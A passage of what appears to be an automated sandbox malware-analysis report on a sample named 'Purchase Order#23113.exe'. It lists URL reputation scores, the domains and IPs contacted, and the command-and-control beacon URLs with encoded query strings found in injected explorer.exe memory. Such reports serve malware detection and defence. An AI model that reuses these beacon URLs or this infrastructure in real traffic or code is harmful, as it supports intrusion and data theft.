          http://www.yesxoit.xyzReferer:0%Avira URL Cloudsafe
          http://www.brandonbirk.comReferer:0%Avira URL Cloudsafe
          http://www.oregonjobs.co0%Avira URL Cloudsafe
          www.yoursweets.online/vr01/2%VirustotalBrowse
          http://www.mks-digital.net/vr01/0%VirustotalBrowse
          http://www.owletbaby.shop0%Avira URL Cloudsafe
          http://www.entelnegocio.comReferer:0%Avira URL Cloudsafe
          http://www.mks-digital.net/vr01/www.brandonbirk.com0%Avira URL Cloudsafe
          http://www.massagechairspecialists.com/vr01/0%Avira URL Cloudsafe
          http://www.oregonjobs.co0%VirustotalBrowse
          http://www.massagechairspecialists.comReferer:0%Avira URL Cloudsafe
          http://www.owletbaby.shop0%VirustotalBrowse
          http://www.xaqh.info/vr01/0%Avira URL Cloudsafe
          http://www.gratiasempirellc.com0%Avira URL Cloudsafe
          http://www.brandonbirk.com/vr01/0%Avira URL Cloudsafe
          http://www.mingshengglass.comReferer:0%Avira URL Cloudsafe
          http://www.sampleshubusa.com/vr01/www.topdeals.biz0%Avira URL Cloudsafe
          http://www.xaqh.info/vr01/0%VirustotalBrowse
          http://www.massagechairspecialists.com/vr01/1%VirustotalBrowse
          http://www.owletbaby.shopReferer:0%Avira URL Cloudsafe
          http://www.owletbaby.shop/vr01/www.yesxoit.xyz0%Avira URL Cloudsafe
          http://www.sampleshubusa.comReferer:0%Avira URL Cloudsafe
          http://www.xaqh.info/vr01/www.mingshengglass.com0%Avira URL Cloudsafe
          http://www.kidscircle.shop/vr01/0%Avira URL Cloudsafe
          http://www.sampleshubusa.com/vr01/0%Avira URL Cloudsafe
          http://www.massagechairspecialists.com/vr01/www.mks-digital.net0%Avira URL Cloudsafe
          http://www.mingshengglass.com/vr01/www.yoursweets.online0%Avira URL Cloudsafe
          http://www.yesxoit.xyz0%Avira URL Cloudsafe
          http://www.massagechairspecialists.com/vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5x0%Avira URL Cloudsafe
          http://www.mingshengglass.com/vr01/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
          http://www.studioenginedemo.com/vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x0%Avira URL Cloudsafe
          http://www.gratiasempirellc.comReferer:0%Avira URL Cloudsafe
          http://www.yoursweets.online/vr01/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.xaqh.info
          		172.67.165.166
          		truetrueunknown
          snugandkind.com
          		66.235.200.146
          		truetrueunknown
          www.owletbaby.shop
          		13.248.169.48
          		truetrueunknown
          www.mingshengglass.com
          		102.134.40.151
          		truetrueunknown
          studioenginedemo.com
          		45.76.63.192
          		truetrueunknown
          oregonjobs.co
          		66.147.240.91
          		truetrueunknown
          gratiasempirellc.com
          		45.88.201.15
          		truetrueunknown
          shops.myshopify.com
          		23.227.38.74
          		truetrueunknown
          ext-sq.squarespace.com
          		198.185.159.144
          		truefalse
            		high
            www.massagechairspecialists.com
            		unknown
            		unknowntrueunknown
            www.brandonbirk.com
            		unknown
            		unknowntrueunknown
            www.studioenginedemo.com
            		unknown
            		unknowntrueunknown
            www.mks-digital.net
            		unknown
            		unknowntrueunknown
            www.gratiasempirellc.com
            		unknown
            		unknowntrueunknown
            www.snugandkind.com
            		unknown
            		unknowntrueunknown
            www.oregonjobs.co
            		unknown
            		unknowntrueunknown
            www.yoursweets.online
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.xaqh.info/vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzftrue
            • Avira URL Cloud: safe
            		unknown
            http://www.mks-digital.net/vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvXtrue
            • Avira URL Cloud: safe
            		unknown
            http://www.snugandkind.com/vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6ztrue
            • Avira URL Cloud: safe
            		unknown
            http://www.oregonjobs.co/vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpitrue
            • Avira URL Cloud: safe
            		unknown
            www.yoursweets.online/vr01/true
            • 2%, Virustotal, Browse
            • Avira URL Cloud: malware
            		low
            http://www.massagechairspecialists.com/vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5xtrue
            • Avira URL Cloud: safe
            		unknown
            http://www.studioenginedemo.com/vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5xtrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.oregonjobs.co/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              http://www.brandonbirk.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.studioenginedemo.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.massagechairspecialists.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://www.gratiasempirellc.com/vr01/www.sampleshubusa.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.yoursweets.onlineexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://www.xaqh.infoexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://excel.office.comexplorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.owletbaby.shop/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.studioenginedemo.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sajatypeworks.comPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.studioenginedemo.com/vr01/www.oregonjobs.coexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.founder.com.cn/cn/cThePurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.topdeals.biz/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.yoursweets.online/vr01/www.massagechairspecialists.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.galapagosdesign.com/DPleasePurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.snugandkind.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gratiasempirellc.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000002.4209139867.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1780447138.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.topdeals.biz/vr01/www.kidscircle.shopexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.urwpp.deDPleasePurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sampleshubusa.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.oregonjobs.coReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.3105954537.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000079B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.kidscircle.shopReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.snugandkind.com/vr01/www.owletbaby.shopexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://wns.windows.com/Lexplorer.exe, 00000003.00000002.4208251758.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1780447138.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://word.office.comexplorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.mks-digital.net/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.oregonjobs.co/vr01/www.gratiasempirellc.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.yesxoit.xyz/vr01/www.studioenginedemo.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.yesxoit.xyzReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.brandonbirk.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.oregonjobs.coexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.owletbaby.shopexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.entelnegocio.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.carterandcone.comlPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000003.00000002.4210627105.000000001157F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.4201113951.000000000590F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.mks-digital.net/vr01/www.brandonbirk.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.massagechairspecialists.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • 1%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.massagechairspecialists.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-user.htmlPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.xaqh.info/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.gratiasempirellc.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.brandonbirk.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.mingshengglass.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.sampleshubusa.com/vr01/www.topdeals.bizexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.owletbaby.shopReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.xaqh.info/vr01/www.mingshengglass.comexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://outlook.com_explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		low
                                                            http://www.kidscircle.shop/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.sampleshubusa.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.owletbaby.shop/vr01/www.yesxoit.xyzexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sampleshubusa.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.massagechairspecialists.com/vr01/www.mks-digital.netexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.mingshengglass.com/vr01/www.yoursweets.onlineexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designersGPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.yesxoit.xyzexplorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.mingshengglass.com/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/?Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/bThePurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers?Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
